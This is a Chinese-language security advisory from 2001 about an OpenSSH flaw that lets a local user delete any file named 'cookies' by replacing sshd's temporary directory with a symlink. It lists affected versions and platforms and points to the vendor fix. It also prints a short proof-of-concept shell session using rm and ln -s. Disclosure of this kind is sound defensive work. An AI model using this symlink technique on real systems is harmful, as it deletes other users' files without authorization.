Openssh 删除任意用户cookies文件漏洞
发布日期:2001-06-05
更新日期:2001-06-08
受影响系统:
openssh 2.9p1
openssh 2.5.2p2
openssh 2.5.2p1
openssh 2.5.2
openssh 2.3.0p1
openssh 2.3.0
openssh 2.1.1
- 各种Linux
- SUN Solaris
- FreeBSD
- openBSD
- NetBSD
- AIX
- IRIX
- HP-UX
描述:
Openssh 是一个开放源码的免费GNU软件,用来提供一个安全高效的加密通信通道。
它存在一个安全问题,允许攻击者删除系统中任意一个名字为cookies的文件。
Openssh会在/tmp下创建一个临时目录来储存cookies,在用户退出ssh时,sshd会将此临时
目录中的cookies文件删除。但是它没有检查此临时目录是不是一个链接。攻击者可以创
建一个链接文件指向任意目录,就可以删除该目录下的cookies文件。
<*来源:zen-parse (
zen-parse@gmx.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
zen-parse (
zen-parse@gmx.net)提供了如下测试方法:
[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
建议:
厂商补丁:
openssh已经在他们的CVS中修复了这个漏洞:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/
我们也建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.openssh.org
浏览次数:11517
严重程度:0(网友投票)